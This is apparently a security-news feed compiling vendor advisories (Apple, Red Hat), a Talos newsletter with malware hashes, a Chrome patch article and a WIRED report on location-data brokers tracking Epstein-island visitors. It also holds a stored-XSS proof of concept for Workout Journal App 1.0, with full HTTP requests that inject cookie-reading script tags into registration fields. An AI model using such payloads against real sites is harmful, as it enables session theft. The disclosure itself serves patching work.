Apple Security Advisory 03-25-2024-2 - macOS Sonoma 14.4.1 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-25-2024-2 macOS Sonoma 14.4.1

macOS Sonoma 14.4.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214096.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

CoreMedia  
Available for: macOS Sonoma  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

WebRTC  
Available for: macOS Sonoma  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

macOS Sonoma 14.4.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmYCPIQACgkQX+5d1TXa  
IvrgbRAAg4RSaUphmr+xku+UTKjqN9BQU8fRYd+5UsN1x2DGTznnh1CIJrLi9XdM  
SkvIz076B9mtB0wlL6E7YCW4on5GXnvRt8OclNBjstjaxUZoqqeT0fs7KrKCm1WV  
fX7qcbIXo73cwzA7j/VoOtDCQr0aXAjBJv4zoIOERwAXw/BwJa8i9VZCeQT3RJr7  
Ww1EhYxfT1/XJhVk2rlTXLOBdL4FetbMNfENt8SozkUBTtOmU3BZeRDZ08RWpTn8  
nh+PKzrwmo+ayY8UcPZPcnrhw1fP8div1CIJc2v1AGnwr1rAzEbucJS4oQheT8SR  
8RhIYUCllkWkHzNTvAOJFc1K4clLPcAu1SG1+K7QPcpXJbMsKAybUGl+GOGbqvO8  
Dm3RHGU8BFgWKTAqDwUGzOs0GdaS/fmpRms+S22HlHx0/Z9kFA3lXEqAiVcxpVq8  
6RPJQiYsp7UBRFlCMx0X5bwCCLSaPPaGgJbWTcx3EaVlOXvUGyHaLcwmZUzicGCu  
GP5GHBjHgINslfm/lYLbUX2BPtT+Sed9VYojNs1ehGSLazpwgFVElpSou0OytxaK  
7mxU+ABDC3L7vn8QBX8ofF1EH/g57CMTKQlJDdVmsDaBmtY/LkOeSay5Zmr3qHDf  
RUFjjsxZltBKwnCQJBbViMbqJKwSdsuhHPSmVxBV0HGY9xiWUqc=  
=W3BD  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-25-2024-2

Workout Journal App version 1.0 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: Workout Journal App 1.0 - Stored XSS# Date: 12.01.2024# Exploit Author: MURAT CAGRI ALIS# Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html># Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Windows / MacOS / Linux# CVE : CVE-2024-24050# DescriptionInstall and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php urlFor the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code.# PoCRegister Request to /workout-journal/endpoints/add-user.phpPOST /workout-journal/endpoint/add-user.php HTTP/1.1Host: localhostContent-Length: 268Cache-Control: max-age=0sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/workout-journal/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vciConnection: closefirst_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456-This request turn back 200 Code on ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:05:52 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Content-Length: 214Connection: closeContent-Type: text/html; charset=UTF-8                <script>                    alert('Account Registered Successfully!');                    window.location.href = 'http://localhost/workout-journal/';                </script>After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right./workout-journal/home.php RequestGET /workout-journal/home.php HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://localhost/workout-journal/endpoint/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1Connection: close/workout-journal/home.php ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:07:56 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 2791Connection: closeContent-Type: text/html; charset=UTF-8    <!DOCTYPE html>    <html lang="en">    <head>        <meta charset="UTF-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <title>Workout Journal App</title>                <link rel="stylesheet" href="./assets/style.css">                <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">        <style>            body {                overflow: hidden;            }        </style>    </head>    <body>        <div class="main">            <nav class="navbar navbar-expand-lg navbar-dark bg-dark">                <a class="navbar-brand ml-3" href="#">Workout Journal App</a>                <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">                    <span class="navbar-toggler-icon"></span>                </button>                <div class="collapse navbar-collapse" id="navbarSupportedContent">                    <ul class="navbar-nav ml-auto">                    <li class="nav-item active">                        <a class="nav-link" href="./endpoint/logout.php">Log Out</a>                    </li>                </div>            </nav>            <div class="landing-page-container">                <div class="heading-container">                    <h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2>                    <p>What would you like to do today?</p>                </div>                <div class="select-option">                    <div class="read-journal" onclick="redirectToReadJournal()">                        <img src="./assets/read.jpg" alt="">                        <p>Read your past workout journals.</p>                    </div>                    <div class="write-journal" onclick="redirectToWriteJournal()">                        <img src="./assets/write.jpg" alt="">                        <p>Write your todays journal.</p>                    </div>                </div>            </div>        </div>                <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js"></script>                <script src="./assets/script.js"></script>    </body>    </html>

Workout Journal App 1.0 Cross Site Scripting

Welcome to this week’s threat source newsletter with Jon out, you’ve got me as your substitute teacher. 

I’m taking you back to those halcyon days of youth and that moment when you found out that you had a sub that day...

Thursday, March 28, 2024 10:00

Welcome to this week’s threat source newsletter with Jon out, you’ve got me as your substitute teacher. 

I’m taking you back to those halcyon days of youth and that moment when you found out that you had a sub that day, will I be the teacher that just rolls in the TV cart and delivers the single greatest blast of freedom that you can have in a classroom, or will I be the teacher that strolls into your 4th grade class and is appalled that you aren’t already conversant in Dostoevsky? Neither. Today I will be the old wizened oracle offering advice and attempting to answer one of the most asked questions I receive at public speaking engagements. So pull up a desk and don’t make that high pitched sound with a wet finger on the basket underneath the seat, because I know the old magicks.  

The number one question that I field after public speaking is “Why did they let you out of your cage to talk to normal people?” and honestly, I don’t really have an answer I just hope that no one notices. The next question is invariably a variation of “How did you become a threat hunter?”, “How do I get a job in cyber security?”, “How do I get a gig within Talos?” The answer is simply – be curious. Intellectual curiosity is the key. I’ll take it a step further when talking specifically about Talos and quote Walt Whitman (via Ted Lasso) and say, “Be curious, not judgmental” because being a positive part of the culture is as important as the deep arcane knowledge and skills that you need to get your foot in the door at Talos.  

There are a lot of paths that you can take in security and the various skill sets along each path vary but curiosity will carry you through each one. A lot of people will tell you to follow your passion and I will vehemently disagree; I will say to follow your aptitude. As you learn and grow within the field, you’ll find that some things come easily, don’t fight the wind in that scenario be the willow. If you are extremely early in your journey, find the helpers. There are tons of super helpful people, sites, and resources available to get you started and finding them is easy if you are curious. Attend a BSides or local security group like AHA. Install Snort and start learning what traffic looks like on the wire and create custom signatures. Install Kali and break things, in your own environment please. Combine the two and see where it will take you. If you are further along in your journey and are interested in taking the next step from analyst to malware research or reverse engineering, you can start with hasherezade's 1001 nights and see if you have the aptitude to follow that path. Don’t be afraid to try something and fail. Don’t expect to be good from the start. Don’t be afraid to ask questions and admit that you don’t know something – the most important things I’ve picked up usually come from “I don’t know, could you teach me?”.  

In the end there are truly almost as many paths as there are people doing the jobs. It’s crazy how varied the backgrounds on our teams are but curiosity is rampant.  

**The one big thing **

The one big thing is that clearly, I’m substituting, and all is normal in the security world. Vulns continue to be exploited, security vendors continue to be consolidated, and everything is as it was in the world. THISISFINEDOTGIF.  

**Why do I care? **

Because it’s what keeps us up at night. That and a warm cup of Liber-Tea.  

**So now what? **

Now we deliver Managed Democracy on Hell Divers 2 – together.  

**Top security headlines of the week **

A newly discovered vulnerability baked into Apple’s M-series of chips allows attackers to extract secret keys from Macs when they perform widely used cryptographic operations, academic researchers have revealed in a paper published Thursday. (Ars Technica, Wired    

Metasploit has announced the release of Metasploit Framework 6.4 which features several improvements and a new feature for Windows Meterpreter that allows for searching a process's memory for user-specified needles with support for regular expressions. (Rapid 7) 

**Can’t get enough Talos? **

*   Cisco Closes $28B Splunk Deal: 5 Big AI, Security And Partner Things To Know 
*   Beers With Talos: The old people episode 
*   Dissecting a complex vulnerability and achieving arbitrary code execution in Ichitaro Word 

**Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5   
**MD5:** ff1b6bb151cf9f671c929a4cbdb64d86   
**Typical Filename:** endpoint.query   
**Claimed Product:** Endpoint-Collector   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f    
**Typical Filename:** VID001.exe    
**Claimed Product:** N/A    
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** e38c53aedf49017c47725e4912fc7560e1c8ece2633c05057b22fd4a8ed28eb3   
**MD5:** c16df0bfc6fda86dbfa8948a566d32c1   
**Typical Filename:** CEPlus.docm   
**Claimed Product:** N/A    
**Detection Name:** Doc.Downloader.Pwshell::mash.sr.sbx.vioc

Enter the substitute teacher

Google has released an update for Chrome to fix seven security vulnerabilities.

Google has released an update to Chrome which includes seven security fixes. Version 123.0.6312.86/.87 of Chrome for Windows and Mac and 123.0.6312.86 for Linux will roll out over the coming days/weeks.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerability in this patch. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete, and for you to be safe from those vulnerabilities.

_After the update, the version should be 123.0.6312.86, or later_

**Technical details**

Google never gives out a lot of information about vulnerabilities, for obvious reasons. Access to bug details and links may be kept restricted until a majority of users are updated with a fix.

There is one critical vulnerability that looks like it might be of interest to cybercriminals.

CVE-2024-2883: Use after free (UAF) vulnerability in Angle in Google Chrome prior to 123.0.6312.86 could allow a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Angle is a browser component that deals with WebGL (short for Web Graphics Library) content. WebGL is a JavaScript API for rendering interactive 2D and 3D graphics within any compatible web browser without the use of plug-ins.

UAF is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. In this case, when the vulnerability is exploited, it can lead to heap corruption.

Heap corruption occurs when a program modifies the contents of a memory location outside of the memory allocated to the program. The outcome can be relatively benign and cause a memory leak, or it may be fatal and cause a memory fault, usually in the program that causes the corruption.

Chromium vulnerabilities are considered critical if they “allow an attacker to read or write arbitrary resources (including but not limited to the file system, registry, network, etc.) on the underlying platform, with the user’s full privileges.”

So, to sum this up, in this case an attacker could create a specially crafted HTML page–which can be put online as a website–that exploits the vulnerability, potentially leading to a compromised system.

My suggestion: don’t wait for the update, get it now.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Update Chrome now! Google patches possible drive-by vulnerability 

A WIRED investigation uncovered coordinates collected by a controversial data broker that reveal sensitive information about visitors to an island once owned by Epstein, the notorious sex offender.

Nearly 200 mobile devices of people who visited Jeffrey Epstein’s notorious “pedophile island” in the years prior to his death left an invisible trail of data pointing back to their own homes and offices. Maps of these visitations generated by a troubled international data broker with defense industry ties, discovered last week by WIRED, document the numerous trips of wealthy and influential individuals seemingly undeterred by Epstein’s status as a convicted sex offender.

The data amassed by Near Intelligence, a location data broker roiled by allegations of mismanagement and fraud, reveals with high precision the residences of many guests of Little Saint James, a United States Virgin Islands property where Epstein is accused of having groomed, assaulted, and trafficked countless women and girls.

Some girls, prosecutors say, were as young as 14. The former attorney general of the US Virgin Islands alleged that girls as young as 12 were trafficked to Epstein by those within his elite social circle.

The coordinates that Near Intelligence collected and left exposed online pinpoint locations to within a few centimeters of space. Visitors were tracked as they moved from the Ritz-Carlton on neighboring St. Thomas Island, for instance, to a specific dock at the American Yacht Harbor—a marina once co-owned by Epstein that hosts an “impressive array” of pleasure boats and mega-yachts. The data pinpointed their movements as they were transported to Epstein’s dock on Little St. James, revealing the exact routes taken to the island.

The tracking continued after they arrived. From inside Epstein's enigmatic waterfront temple to the pristine beaches, pools, and cabanas scattered across his 71-acres of prime archipelagic real estate, the data compiled by Near captures the movements of scores of people who sojourned at Little St. James as early as July 2016. The recorded surveillance concludes on July 6, 2019—the day of Epstein’s final arrest.

Eleven years earlier, the disgraced financier was sentenced to 18 months in jail after a guilty plea in 2008 for soliciting and procuring a minor engaged in prostitution, securing a secret “sweetheart” deal to avoid any federal charges. Renewed interest in the case, notably prompted by a _Miami Herald_ investigation, spawned new charges against Epstein, who was apprehended at New Jersey’s Teterboro Airport in July 2019. A raid of Epstein’s Manhattan townhouse by federal agents yielded a cache of child sexual abuse material, nearly 50 individually cut diamonds, and a fraudulent Saudia Arabian passport, which had expired. He reportedly died by suicide a month later while incarcerated at the Metropolitan Correctional Center, a federal detention facility that closed shortly after Epstein’s death.

Ghislaine Maxwell, former British socialite and an Epstein accomplice, was convicted in 2021 on five counts including sexual trafficking of children by force. Maxwell was arrested in New Hampshire, tracked to a million-dollar home by federal agents using location data pulled from her cell phone.

Little is known publicly about Epstein’s activities in the decade prior to his 2019 arrest. The majority of women who came forward that year to accuse the convicted pedophile in court say they were assaulted in the ’90s and early 2000s.

Now, however, 11,279 coordinates obtained by WIRED show not only a flood of traffic to Epstein’s island property—nearly a decade after his conviction as a sex offender—but also point to as many as 166 locations throughout the US where Near Intelligence infers that visitors to Little St. James likely lived and worked. The cache also points to cities in Ukraine, the Cayman Islands, and Australia, among others.

Near Intelligence, for example, tracked devices visiting Little St. James from locations in 80 cities crisscrossing 26 US states and territories, with Florida, Massachusetts, Texas, Michigan, and New York topping the list. The coordinates point to mansions in gated communities in Michigan and Florida; homes in Martha’s Vineyard and Nantucket in Massachusetts; a nightclub in Miami; and the sidewalk across the street from Trump Tower on Fifth Avenue in New York City.

The coordinates also point to various Epstein properties beyond Little St. James, including his 8,000-acre New Mexico ranch and a waterfront mansion on El Brillo Way in Palm Beach, where prosecutors said in an indictment that Epstein trafficked numerous “minor girls” for the purposes of molesting and abusing them. Near’s data is notably missing any locations in Europe, where citizens are safeguarded by comprehensive privacy laws.

Near Intelligence’s maps of Epstein’s island reveal in stark detail the precision surveillance that data brokers can achieve with the aid of loose privacy restrictions under US law. The firm, which has roots in Singapore and Bengaluru, India, sources its location data from advertising exchanges—companies that quietly interact with billions of devices as users browse the web and move about the world.

Before a targeted advertisement appears on an app or website, phones and other devices send information about their owners to real-time bidding platforms and ad exchanges, frequently including users’ location data. While advertisers can use this data to inform their bidding decisions, companies like Near Intelligence will siphon, repackage, analyze, and sell it.

Several ad exchanges, according to _The Wall Street Journal_, have reportedly terminated arrangements with Near, claiming that its use of their data violated the exchanges’ terms of service.

Officially, this data is intended to be used by companies hoping to determine where potential customers work and reside. But in October 2023, the _Journal_ revealed that Near had once provided data to the US military via a maze of obscure marketing companies, cutouts, and conduits to defense contractors. Bankruptcy records reviewed by WIRED show that in April 2023, Near Intelligence signed a yearlong contract with another firm called nContext, a subsidiary of the defense contractor Sierra Nevada.

nContext secured six federal contracts to provide data in support of the National Security Agency and the Defense Counterintelligence and Security Agency, according to reporting by Byron Tau, author of _Means of Control_, an exposé of the data-broker industry and its ties to the US surveillance state. According to information released during a $100 million funding round in 2019, Near claims to have information on roughly 1.6 billion people in 44 countries.

“The pervasive surveillance machine that has been developed for digital advertising now enables other uses completely unrelated to marketing, including government mass surveillance,” says Wolfie Christl, a Vienna-based researcher at Cracked Labs who investigates the data industry.

The data on Epstein’s guests was produced using an intelligence platform formerly known as Vista, which has now been folded into a product called Pinnacle. WIRED discovered several so-called Vista reports while examining Pinnacle’s publicly accessible code. While the specific URLs for the reports are difficult to find, Google’s web crawlers were able to locate at least two other publicly accessible Vista reports: one geofencing the Westfield Mall of the Netherlands and another targeting Saipan-Ledo Park in El Paso, Texas.

The Little St. James report features five maps, one of which reveals locations of devices observed on the island over more than three years prior to Epstein’s arrest. Two of the maps indicate the inferred “Common Evening Locations” and “Common Daytime Locations” for each device that had visited the island. According to the Vista report, these metrics are meant to show visitors’ “most frequented location on weekdays” as well as weeknights and weekends.

A fourth map shows the “general geographic areas from which a location generates the majority of its visits.” The fifth details visitors’ locations 30 minutes before and after they arrived on Epstein’s island, producing a trail of signals that show phones and other devices carried over by helicopter and boat from the main island.

WIRED extracted the location data from the charts and maps to conduct its analysis, which is ongoing. For this story, we reproduced some of the maps created by Near, while excluding any precise location data that could be used to identify properties or individuals, to protect the privacy of anyone uninvolved in Epstein’s crimes.

Crippled by debt, Near Intelligence filed for bankruptcy protection in December, reporting liabilities of approximately $100 million, less than a year after being listed by Nasdaq. An independent investigation commissioned by the company's board alleged multiple executives engaged in a years-long “concealed scheme” to cheat the company out of tens of millions of dollars. (One of those former executives has filed a claim against the company alleging defamation.)

Near Intelligence has since quietly resumed operations, under the same leadership that initiated the bankruptcy proceedings, rebranding itself as a newly incorporated entity called Azira.

US senator Ron Wyden in early February urged federal regulators to launch investigations into Near Intelligence, citing reporting by _The Wall Street Journal_ that found its platform had been used by a third party to geofence “sensitive locations,” including roughly 600 reproductive health clinics at the behest of a conservative group that waged a multiyear antiabortion campaign. US regulators have begun to designate certain types of locations “sensitive,” including health clinics, domestic abuse shelters, and places of religious worship, in an attempt to shield Americans from predatory data brokers amid the US Congress’s years-long failure to pass a comprehensive privacy law.

In an email to WIRED, Kathleen Wailes, speaking on behalf of Azira, acknowledged that Near Intelligence had deliberately collected the data on Epstein’s island for its own purposes. Wailes declined multiple invitations to discuss how the data was collected, which prospective client may have created the report of Epstein’s island, and what purpose it served.

Image: WIRED/Flourish

“Azira is committed to data privacy and responsible access to and use of location data,” Wailes said. “To this end, Azira works to track and respond to legal developments under emerging new state laws, FTC guidance and prior enforcement examples, and best practices. Azira is developing procedures to protect consumers' sensitive location data. This includes working to disable all sample offering accounts created by Near.”

Although the discovery of the Epstein island data involved many additional steps, WIRED also found it could be easily retrieved with a simple Google search.

A Department of Justice spokesperson for the US District Court for the Southern District of New York, where Epstein was prosecuted in 2019, declined to comment on whether its investigators ever did business with Near.

While many of the coordinates captured by Near point to multimillion-dollar homes in numerous US states, others point to lower-income areas where Epstein victims are known to have lived and attended school, including areas of West Palm Beach, Florida, where police and a private investigator say they located around 40 of Epstein’s victims.

"Most of the clients who come to me, their number one concern is privacy and safety,” says attorney Lisa Bloom, who represented 11 of Epstein's alleged victims. “It's deeply concerning to think that any sexual abuse victims’ location will be tracked and then stored and then sold to someone, who can presumably do whatever they want with it.”

Legislation introduced during multiple sessions of Congress have aimed to restrict the sale of location data, chiefly to prevent US law enforcement and intelligence agencies from tracking Americans without a warrant. So far, those efforts have failed. Separately, US president Joe Biden issued an executive order in February instructing the Justice Department to establish new rules preventing US companies from selling data to rival nations, which might include Iran, China, Russia, and North Korea. This order is unlikely to impact Azira’s business in the United States.

“The fact that they have this data in the first place and are allowing people to share it is certainly disturbing,” says Eva Galperin, the director of cybersecurity at the Electronic Frontier Foundation, a digital-rights nonprofit. “I just don’t know how many more of these stories we need to have in order to get strong privacy regulations.”

Jeffrey Epstein's Island Visitors Exposed by Data Broker

Red Hat Security Advisory 2024-1514-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1514.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: libreoffice security fix updateAdvisory ID:        RHSA-2024:1514-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1514Issue date:         2024-03-26Revision:           03CVE Names:          CVE-2023-6185====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185)* libreoffice: Insufficient macro permission validation leading to macro execution (CVE-2023-6186)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6185References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2254003https://bugzilla.redhat.com/show_bug.cgi?id=2254005

Red Hat Security Advisory 2024-1514-03

Red Hat Security Advisory 2024-1513-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1513.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: libreoffice security fix updateAdvisory ID:        RHSA-2024:1513-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1513Issue date:         2024-03-26Revision:           03CVE Names:          CVE-2023-6185====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185)* libreoffice: Insufficient macro permission validation leading to macro execution (CVE-2023-6186)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6185References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2254003https://bugzilla.redhat.com/show_bug.cgi?id=2254005

Red Hat Security Advisory 2024-1513-03

Red Hat Security Advisory 2024-1512-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1512.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: libreoffice security fix updateAdvisory ID:        RHSA-2024:1512-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1512Issue date:         2024-03-26Revision:           03CVE Names:          CVE-2023-6185====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185)* libreoffice: Insufficient macro permission validation leading to macro execution (CVE-2023-6186)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6185References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2254003https://bugzilla.redhat.com/show_bug.cgi?id=2254005

Red Hat Security Advisory 2024-1512-03

By Uzair Amir
Curious to learn how GoMining is pioneering the democratization of crypto mining? Read on as we explore their approach, technicals, and how they ensure safety for their users.
